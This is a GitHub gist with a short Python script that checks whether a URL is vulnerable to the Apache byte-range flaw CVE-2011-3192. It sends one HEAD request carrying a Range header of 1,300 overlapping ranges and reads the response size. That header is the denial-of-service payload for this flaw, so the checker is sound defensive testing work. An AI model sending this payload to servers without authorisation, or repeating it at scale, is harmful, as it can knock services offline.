Created
August 25, 2011 11:06
-
-
Save dcarley/1170447 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| """ | |
| Test the probabilty of a URL being vulnerable to CVE-2011-3192 | |
| http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192 | |
| Both this test and real PoC are largely dependent on the content being | |
| served. Dynamic content rendered by mod_php and mod_wsgi is unlikely to be | |
| affected, whereas static or proxied content from the same VirtualHost or | |
| Apache instance may still be vulnerable. For this reason it is worth testing | |
| a variety of different URLs on each server. | |
| @dancarley | |
| """ | |
| import sys | |
| import httplib2 | |
| from pprint import pprint | |
| from urlparse import urlparse | |
| if len(sys.argv) != 2: | |
| sys.exit("Usage: %s URL" % sys.argv[0]) | |
| url = sys.argv[1] | |
| urlparse(url) | |
| headers = { | |
| "Range": "bytes=0-%s" % "".join( | |
| [",5-%s" % x for x in range(1,1301)] | |
| ), | |
| "Accept-Encoding": "gzip", | |
| "Connection": "close", | |
| } | |
| h = httplib2.Http() | |
| resp, cont = h.request(url, "HEAD", headers=headers) | |
| result = "address %r is probably" % url | |
| pprint(resp) | |
| if resp["status"] == "206" and int(resp["content-length"]) > 90000: | |
| print "\n%s vulnerable" % result | |
| else: | |
| print "\n%s NOT vulnerable" % result |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment